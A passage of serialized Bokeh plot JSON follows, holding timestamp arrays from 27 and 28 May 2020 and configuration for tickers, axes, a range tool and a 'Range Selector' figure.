22:42:01+00:00\",\"2020-05-27 22:47:18+00:00\",\"2020-05-27 22:52:14+00:00\",\"2020-05-27 22:57:06+00:00\",\"2020-05-27 23:02:26+00:00\",\"2020-05-27 23:07:33+00:00\",\"2020-05-27 23:12:35+00:00\",\"2020-05-27 23:17:01+00:00\",\"2020-05-28 02:26:22+00:00\",\"2020-05-28 02:31:22+00:00\",\"2020-05-28 02:37:03+00:00\",\"2020-05-28 02:41:40+00:00\",\"2020-05-28 02:46:40+00:00\",\"2020-05-28 02:51:58+00:00\",\"2020-05-28 02:56:54+00:00\",\"2020-05-28 03:02:16+00:00\",\"2020-05-28 03:06:59+00:00\",\"2020-05-28 03:11:58+00:00\",\"2020-05-28 03:17:05+00:00\",\"2020-05-27 20:22:06+00:00\",\"2020-05-27 20:26:50+00:00\",\"2020-05-27 20:32:25+00:00\",\"2020-05-27 20:37:04+00:00\",\"2020-05-27 20:42:05+00:00\",\"2020-05-27 20:47:04+00:00\",\"2020-05-27 20:52:35+00:00\",\"2020-05-27 20:57:02+00:00\",\"2020-05-27 21:02:08+00:00\",\"2020-05-27 21:07:00+00:00\",\"2020-05-27 21:12:20+00:00\",\"2020-05-27 21:16:58+00:00\",\"2020-05-28 13:32:38+00:00\",\"2020-05-28 13:37:36+00:00\",\"2020-05-28 13:42:08+00:00\",\"2020-05-28 13:46:29+00:00\",\"2020-05-28 13:51:42+00:00\",\"2020-05-28 13:59:05+00:00\",\"2020-05-28 14:03:09+00:00\",\"2020-05-28 14:06:47+00:00\",\"2020-05-28 14:11:34+00:00\",\"2020-05-28 14:16:38+00:00\",\"2020-05-28 14:22:42+00:00\",\"2020-05-28 14:26:57+00:00\",\"2020-05-28 15:32:16+00:00\",\"2020-05-28 15:37:43+00:00\",\"2020-05-28 15:41:52+00:00\",\"2020-05-28 15:46:42+00:00\",\"2020-05-28 15:51:45+00:00\",\"2020-05-28 15:58:17+00:00\",\"2020-05-28 16:02:18+00:00\",\"2020-05-28 16:07:15+00:00\",\"2020-05-28 16:12:19+00:00\",\"2020-05-28 16:17:26+00:00\",\"2020-05-28 16:22:05+00:00\",\"2020-05-28 16:27:14+00:00\",\"2020-05-28 10:32:28+00:00\",\"2020-05-28 10:37:15+00:00\",\"2020-05-28 10:42:42+00:00\",\"2020-05-28 10:47:18+00:00\",\"2020-05-28 10:52:56+00:00\",\"2020-05-28 10:57:20+00:00\",\"2020-05-28 11:05:34+00:00\",\"2020-05-28 11:07:39+00:00\",\"2020-05-28 11:12:26+00:00\",\"2020-05-28 11:17:35+00:00\",\"2020-05-28 11:23:07+00:00\",\"2020-05-28 08:32:20+00:00\",\"2020-05-28 08:37:22+00:00\",\"2020-05-28 08:43:29+00:00\",\"2020-05-28 08:48:22+00:00\",\"2020-05-28 08:52:19+00:00\",\"2020-05-28 08:57:09+00:00\",\"2020-05-28 09:02:33+00:00\",\"2020-05-28 09:07:31+00:00\",\"2020-05-28 09:13:21+00:00\",\"2020-05-28 09:17:45+00:00\",\"2020-05-28 09:22:33+00:00\",\"2020-05-28 09:33:09+00:00\",\"2020-05-28 09:37:57+00:00\",\"2020-05-28 09:42:28+00:00\",\"2020-05-28 09:47:21+00:00\",\"2020-05-28 09:52:17+00:00\",\"2020-05-28 09:57:19+00:00\",\"2020-05-28 10:02:26+00:00\",\"2020-05-28 10:07:24+00:00\",\"2020-05-28 10:13:04+00:00\",\"2020-05-28 10:17:38+00:00\",\"2020-05-28 10:22:46+00:00\",\"2020-05-28 03:26:38+00:00\",\"2020-05-28 03:31:41+00:00\",\"2020-05-28 03:37:25+00:00\",\"2020-05-28 03:41:52+00:00\",\"2020-05-28 03:46:42+00:00\",\"2020-05-28 03:51:39+00:00\",\"2020-05-28 03:56:48+00:00\",\"2020-05-28 04:01:36+00:00\",\"2020-05-28 04:07:14+00:00\",\"2020-05-28 04:12:07+00:00\",\"2020-05-28 04:16:55+00:00\",\"2020-05-28 17:32:23+00:00\",\"2020-05-28 17:37:07+00:00\",\"2020-05-27 17:56:58+00:00\",\"2020-05-27 18:01:43+00:00\",\"2020-05-27 18:06:58+00:00\",\"2020-05-27 18:12:11+00:00\",\"2020-05-27 18:17:00+00:00\",\"2020-05-28 12:32:11+00:00\",\"2020-05-28 12:36:26+00:00\",\"2020-05-28 12:42:38+00:00\",\"2020-05-28 12:46:26+00:00\",\"2020-05-28 12:51:55+00:00\",\"2020-05-28 12:57:08+00:00\",\"2020-05-28 13:03:45+00:00\",\"2020-05-28 13:07:59+00:00\",\"2020-05-28 13:12:07+00:00\",\"2020-05-28 13:16:41+00:00\",\"2020-05-28 13:21:33+00:00\",\"2020-05-28 16:32:00+00:00\",\"2020-05-28 16:36:55+00:00\",\"2020-05-28 16:44:17+00:00\",\"2020-05-28 16:47:16+00:00\",\"2020-05-28 16:51:52+00:00\",\"2020-05-28 16:56:50+00:00\",\"2020-05-28 17:02:02+00:00\",\"2020-05-28 17:08:49+00:00\",\"2020-05-28 17:12:51+00:00\",\"2020-05-28 17:17:06+00:00\",\"2020-05-28 17:22:00+00:00\",\"2020-05-28 17:26:47+00:00\",\"2020-05-28 06:26:57+00:00\",\"2020-05-28 05:27:19+00:00\",\"2020-05-28 05:32:11+00:00\",\"2020-05-28 05:37:10+00:00\",\"2020-05-28 05:41:51+00:00\",\"2020-05-28 05:46:54+00:00\",\"2020-05-28 05:52:04+00:00\",\"2020-05-28 05:57:38+00:00\",\"2020-05-28 06:01:57+00:00\",\"2020-05-28 06:06:55+00:00\",\"2020-05-28 06:11:46+00:00\",\"2020-05-28 06:16:47+00:00\",\"2020-05-27 22:07:06+00:00\",\"2020-05-27 22:12:15+00:00\",\"2020-05-27 22:22:35+00:00\",\"2020-05-27 22:52:24+00:00\",\"2020-05-27 22:17:24+00:00\",\"2020-05-27 22:27:44+00:00\",\"2020-05-27 22:02:59+00:00\",\"2020-05-27 22:32:54+00:00\",\"2020-05-27 22:37:11+00:00\",\"2020-05-27 22:42:40+00:00\",\"2020-05-27 22:47:04+00:00\",\"2020-05-28 15:07:11+00:00\",\"2020-05-28 15:12:37+00:00\",\"2020-05-28 15:17:00+00:00\",\"2020-05-28 15:22:27+00:00\",\"2020-05-28 15:27:57+00:00\",\"2020-05-28 15:32:17+00:00\",\"2020-05-28 15:37:41+00:00\",\"2020-05-28 15:42:05+00:00\",\"2020-05-28 15:47:29+00:00\",\"2020-05-28 15:02:48+00:00\",\"2020-05-28 15:53:05+00:00\",\"2020-05-27 18:02:20+00:00\",\"2020-05-27 18:07:51+00:00\",\"2020-05-27 18:12:12+00:00\",\"2020-05-27 18:22:03+00:00\",\"2020-05-27 18:37:15+00:00\",\"2020-05-27 18:17:45+00:00\",\"2020-05-27 18:32:52+00:00\",\"2020-05-27 18:52:31+00:00\",\"2020-05-27 18:27:24+00:00\",\"2020-05-27 18:42:37+00:00\",\"2020-05-27 18:47:01+00:00\",\"2020-05-28 03:02:30+00:00\",\"2020-05-28 03:07:43+00:00\",\"2020-05-28 03:18:00+00:00\",\"2020-05-28 03:27:18+00:00\",\"2020-05-28 03:42:49+00:00\",\"2020-05-28 03:52:01+00:00\",\"2020-05-28 03:12:49+00:00\",\"2020-05-28 03:22:08+00:00\",\"2020-05-28 03:32:27+00:00\",\"2020-05-28 03:37:41+00:00\",\"2020-05-28 03:47:57+00:00\",\"2020-05-28 16:18:01+00:00\",\"2020-05-28 16:32:35+00:00\",\"2020-05-28 16:42:55+00:00\",\"2020-05-28 16:02:42+00:00\",\"2020-05-28 16:22:11+00:00\",\"2020-05-28 16:27:20+00:00\",\"2020-05-28 16:37:42+00:00\",\"2020-05-28 16:47:13+00:00\",\"2020-05-28 16:52:11+00:00\",\"2020-05-28 16:07:06+00:00\",\"2020-05-28 16:12:33+00:00\",\"2020-05-27 19:27:28+00:00\",\"2020-05-27 19:37:14+00:00\",\"2020-05-27 19:42:32+00:00\",\"2020-05-27 19:07:57+00:00\",\"2020-05-27 19:21:59+00:00\",\"2020-05-27 19:52:13+00:00\",\"2020-05-27 19:02:24+00:00\",\"2020-05-27 19:12:16+00:00\",\"2020-05-27 19:17:41+00:00\",\"2020-05-27 19:33:00+00:00\",\"2020-05-27 19:47:52+00:00\",\"2020-05-28 08:22:28+00:00\",\"2020-05-28 08:27:40+00:00\",\"2020-05-28 08:38:00+00:00\",\"2020-05-28 08:47:30+00:00\",\"2020-05-28 08:02:12+00:00\",\"2020-05-28 08:07:28+00:00\",\"2020-05-28 08:12:55+00:00\",\"2020-05-28 08:17:28+00:00\",\"2020-05-28 08:32:52+00:00\",\"2020-05-28 08:42:13+00:00\",\"2020-05-28 08:52:48+00:00\",\"2020-05-28 05:03:00+00:00\",\"2020-05-28 05:37:52+00:00\",\"2020-05-28 05:42:04+00:00\",\"2020-05-28 05:52:37+00:00\",\"2020-05-28 05:07:19+00:00\",\"2020-05-28 05:17:55+00:00\",\"2020-05-28 05:22:09+00:00\",\"2020-05-28 05:47:32+00:00\",\"2020-05-28 05:12:39+00:00\",\"2020-05-28 05:27:29+00:00\",\"2020-05-28 05:32:36+00:00\",\"2020-05-28 08:58:00+00:00\",\"2020-05-28 10:07:32+00:00\",\"2020-05-28 10:12:47+00:00\",\"2020-05-28 10:23:07+00:00\",\"2020-05-28 10:37:24+00:00\",\"2020-05-28 10:42:36+00:00\",\"2020-05-28 10:47:50+00:00\",\"2020-05-28 10:02:24+00:00\",\"2020-05-28 10:17:55+00:00\",\"2020-05-28 10:52:57+00:00\",\"2020-05-28 10:27:08+00:00\",\"2020-05-28 10:32:16+00:00\",\"2020-05-28 07:07:21+00:00\",\"2020-05-28 07:12:51+00:00\",\"2020-05-28 07:32:31+00:00\",\"2020-05-28 07:47:23+00:00\",\"2020-05-28 07:02:54+00:00\",\"2020-05-28 07:17:08+00:00\",\"2020-05-28 07:22:36+00:00\",\"2020-05-28 07:27:02+00:00\",\"2020-05-28 07:37:46+00:00\",\"2020-05-28 07:42:02+00:00\",\"2020-05-28 07:52:40+00:00\",\"2020-05-28 11:02:12+00:00\",\"2020-05-28 11:27:58+00:00\",\"2020-05-28 11:52:56+00:00\",\"2020-05-28 11:07:18+00:00\",\"2020-05-28 11:37:22+00:00\",\"2020-05-28 11:12:30+00:00\",\"2020-05-28 11:17:41+00:00\",\"2020-05-28 11:22:50+00:00\",\"2020-05-28 11:32:08+00:00\",\"2020-05-28 11:42:36+00:00\",\"2020-05-28 11:47:44+00:00\",\"2020-05-27 23:57:56+00:00\",\"2020-05-28 00:07:27+00:00\",\"2020-05-28 00:22:15+00:00\",\"2020-05-28 00:37:18+00:00\",\"2020-05-28 00:52:10+00:00\",\"2020-05-28 00:02:10+00:00\",\"2020-05-28 00:17:03+00:00\",\"2020-05-28 00:27:41+00:00\",\"2020-05-28 00:47:53+00:00\",\"2020-05-28 00:12:50+00:00\",\"2020-05-28 00:33:04+00:00\",\"2020-05-28 00:42:27+00:00\",\"2020-05-28 09:02:32+00:00\",\"2020-05-28 09:12:51+00:00\",\"2020-05-28 09:32:39+00:00\",\"2020-05-28 09:18:12+00:00\",\"2020-05-28 09:22:13+00:00\",\"2020-05-28 09:37:43+00:00\",\"2020-05-28 09:42:53+00:00\",\"2020-05-28 09:52:06+00:00\",\"2020-05-28 09:07:39+00:00\",\"2020-05-28 09:27:26+00:00\",\"2020-05-28 09:47:01+00:00\",\"2020-05-28 17:17:55+00:00\",\"2020-05-28 17:22:20+00:00\",\"2020-05-28 17:32:13+00:00\",\"2020-05-28 17:37:41+00:00\",\"2020-05-28 17:02:48+00:00\",\"2020-05-28 17:07:08+00:00\",\"2020-05-28 17:12:32+00:00\",\"2020-05-28 17:27:47+00:00\",\"2020-05-28 04:02:45+00:00\",\"2020-05-28 04:07:55+00:00\",\"2020-05-28 04:17:11+00:00\",\"2020-05-28 04:27:38+00:00\",\"2020-05-28 04:32:53+00:00\",\"2020-05-28 04:37:10+00:00\",\"2020-05-28 04:42:35+00:00\",\"2020-05-28 04:52:12+00:00\",\"2020-05-28 04:12:02+00:00\",\"2020-05-28 04:22:29+00:00\",\"2020-05-28 04:47:55+00:00\",\"2020-05-28 12:23:01+00:00\",\"2020-05-28 12:02:14+00:00\",\"2020-05-28 12:12:35+00:00\",\"2020-05-28 12:27:08+00:00\",\"2020-05-28 12:43:00+00:00\",\"2020-05-28 12:07:22+00:00\",\"2020-05-28 12:17:46+00:00\",\"2020-05-28 12:32:24+00:00\",\"2020-05-28 12:37:33+00:00\",\"2020-05-28 12:47:25+00:00\",\"2020-05-28 12:52:49+00:00\",\"2020-05-27 23:02:15+00:00\",\"2020-05-27 23:07:38+00:00\",\"2020-05-27 23:12:06+00:00\",\"2020-05-27 23:17:15+00:00\",\"2020-05-27 23:27:03+00:00\",\"2020-05-27 23:32:11+00:00\",\"2020-05-27 23:37:20+00:00\",\"2020-05-27 23:42:33+00:00\",\"2020-05-27 23:52:31+00:00\",\"2020-05-27 23:22:52+00:00\",\"2020-05-27 23:47:04+00:00\",\"2020-05-28 01:17:19+00:00\",\"2020-05-28 01:27:07+00:00\",\"2020-05-28 01:32:24+00:00\",\"2020-05-28 01:47:13+00:00\",\"2020-05-28 01:02:00+00:00\",\"2020-05-28 01:37:46+00:00\",\"2020-05-28 01:42:04+00:00\",\"2020-05-28 01:52:20+00:00\",\"2020-05-28 01:07:28+00:00\",\"2020-05-28 01:13:04+00:00\",\"2020-05-28 01:22:50+00:00\",\"2020-05-28 13:18:00+00:00\",\"2020-05-28 13:52:57+00:00\",\"2020-05-28 13:07:04+00:00\",\"2020-05-28 13:12:34+00:00\",\"2020-05-28 13:37:36+00:00\",\"2020-05-28 13:02:52+00:00\",\"2020-05-28 13:22:21+00:00\",\"2020-05-28 13:27:52+00:00\",\"2020-05-28 13:32:11+00:00\",\"2020-05-28 13:42:05+00:00\",\"2020-05-28 13:47:29+00:00\",\"2020-05-28 06:12:28+00:00\",\"2020-05-28 06:17:58+00:00\",\"2020-05-28 06:27:48+00:00\",\"2020-05-28 06:52:02+00:00\",\"2020-05-28 06:03:01+00:00\",\"2020-05-28 06:07:09+00:00\",\"2020-05-28 06:37:13+00:00\",\"2020-05-28 06:22:16+00:00\",\"2020-05-28 06:32:57+00:00\",\"2020-05-28 06:42:24+00:00\",\"2020-05-28 06:47:48+00:00\",\"2020-05-28 14:02:46+00:00\",\"2020-05-28 14:12:37+00:00\",\"2020-05-28 14:37:35+00:00\",\"2020-05-28 14:07:13+00:00\",\"2020-05-28 14:17:06+00:00\",\"2020-05-28 14:42:01+00:00\",\"2020-05-28 14:47:28+00:00\",\"2020-05-28 14:22:30+00:00\",\"2020-05-28 14:27:52+00:00\",\"2020-05-28 14:32:12+00:00\",\"2020-05-28 14:53:05+00:00\",\"2020-05-27 20:02:01+00:00\",\"2020-05-27 20:42:28+00:00\",\"2020-05-27 20:47:37+00:00\",\"2020-05-27 20:07:18+00:00\",\"2020-05-27 20:17:42+00:00\",\"2020-05-27 20:32:09+00:00\",\"2020-05-27 20:37:19+00:00\",\"2020-05-27 20:52:47+00:00\",\"2020-05-27 20:12:34+00:00\",\"2020-05-27 20:22:54+00:00\",\"2020-05-27 20:27:02+00:00\",\"2020-05-27 21:02:01+00:00\",\"2020-05-27 21:07:11+00:00\",\"2020-05-27 21:17:35+00:00\",\"2020-05-27 21:47:35+00:00\",\"2020-05-27 21:52:39+00:00\",\"2020-05-27 21:12:27+00:00\",\"2020-05-27 21:22:46+00:00\",\"2020-05-27 21:32:06+00:00\",\"2020-05-27 21:37:16+00:00\",\"2020-05-27 21:42:24+00:00\",\"2020-05-27 21:27:57+00:00\",\"2020-05-28 02:02:42+00:00\",\"2020-05-28 02:07:51+00:00\",\"2020-05-28 02:27:27+00:00\",\"2020-05-28 02:32:36+00:00\",\"2020-05-28 02:47:01+00:00\",\"2020-05-28 02:52:17+00:00\",\"2020-05-28 02:13:03+00:00\",\"2020-05-28 02:17:09+00:00\",\"2020-05-28 02:22:19+00:00\",\"2020-05-28 02:37:44+00:00\",\"2020-05-28 02:42:57+00:00\"],\"y_index\":[1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1]},\"selected\":{\"id\":\"2082\"},\"selection_policy\":{\"id\":\"2083\"}},\"id\":\"2037\",\"type\":\"ColumnDataSource\"},{\"attributes\":{\"days\":[1,15]},\"id\":\"2076\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"2023\",\"type\":\"DataRange1d\"},{\"attributes\":{\"overlay\":{\"id\":\"2044\"},\"x_range\":{\"id\":\"1981\"},\"y_range\":null},\"id\":\"2043\",\"type\":\"RangeTool\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"2080\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"2070\"},{\"id\":\"2071\"},{\"id\":\"2072\"},{\"id\":\"2073\"},{\"id\":\"2074\"},{\"id\":\"2075\"},{\"id\":\"2076\"},{\"id\":\"2077\"},{\"id\":\"2078\"},{\"id\":\"2079\"},{\"id\":\"2080\"},{\"id\":\"2081\"}]},\"id\":\"2030\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"2055\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"days\":[1,8,15,22]},\"id\":\"2075\",\"type\":\"DaysTicker\"},{\"attributes\":{\"text\":\"Range Selector\"},\"id\":\"2019\",\"type\":\"Title\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"2056\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"2081\",\"type\":\"YearsTicker\"},{\"attributes\":{\"end\":1590695994200.0,\"start\":1590593691800.0},\"id\":\"1981\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"2058\",\"type\":\"DaysTicker\"},{\"attributes\":{\"formatter\":{\"id\":\"2035\"},\"ticker\":{\"id\":\"2030\"}},\"id\":\"2029\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"source\":{\"id\":\"2037\"}},\"id\":\"2042\",\"type\":\"CDSView\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"2057\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"below\":[{\"id\":\"1989\"}],\"center\":[{\"id\":\"1992\"},{\"id\":\"1996\"}],\"left\":[{\"id\":\"1993\"}],\"min_border_left\":50,\"plot_height\":300,\"plot_width\":900,\"renderers\":[{\"id\":\"2016\"}],\"title\":{\"id\":\"1979\"},\"toolbar\":{\"id\":\"2003\"},\"toolbar_location\":\"above\",\"x_range\":{\"id\":\"1981\"},\"x_scale\":{\"id\":\"1985\"},\"y_range\":{\"id\":\"1983\"},\"y_scale\":{\"id\":\"1987\"}},\"id\":\"1978\",\"subtype\":\"Figure\",\"type\":\"P